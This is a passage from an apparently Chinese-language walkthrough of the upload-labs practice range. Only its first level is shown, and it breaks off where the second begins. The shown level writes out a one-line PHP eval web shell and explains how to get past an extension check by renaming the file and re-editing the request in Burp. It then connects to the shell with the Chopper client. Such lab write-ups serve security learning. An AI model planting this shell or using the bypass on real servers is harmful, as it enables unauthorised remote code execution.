upload-labs上传漏洞靶场--pass1,2,11,12,17

upload-labs上传漏洞靶场 1、pass-1改变文件后缀名 新建一句话木马文件:<?php @eval($_POST['x']);?>,并上传。 发现.php文件上传失败,只能使用图片上传 我们修改.php文件的后缀名为.jpg上传,并使用burp抓包 将.jpg修改成.php后,关闭拦截,发送成功 这时,我们复制图片地址,打开菜刀,新建项目 填写相应信息 成功进入对方电脑 2、pass-
相关文章
相关标签/搜索